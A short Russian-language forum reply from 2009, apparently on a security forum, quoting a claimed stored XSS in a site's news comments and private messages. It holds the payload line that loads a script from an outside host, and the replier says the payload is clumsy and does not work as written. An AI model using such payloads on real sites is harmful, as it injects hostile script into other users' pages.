20.05.2009, 11:12
|
|
Новичок
Регистрация: 19.05.2009
Сообщений: 19
Провел на форуме:
133889
Репутация:
1
|
|
Сообщение от wildshaman
Код:
XSS в комментариях к новостям, WISYWIG должен быть включен:
<SCRIPT SRC=http://ha.ckers.org/xss.js?<
Ет коряво и не работает, т.к. к адресу скрипта коннектится "<" и следующий тег, да и полстраницы обрезается... Если в другю сторону загнуть - фильтрует.
З.Ы. Такая же "уязвимость" и в приватных месагах.
Последний раз редактировалось Genry13; 20.05.2009 в 11:15..
|
|
|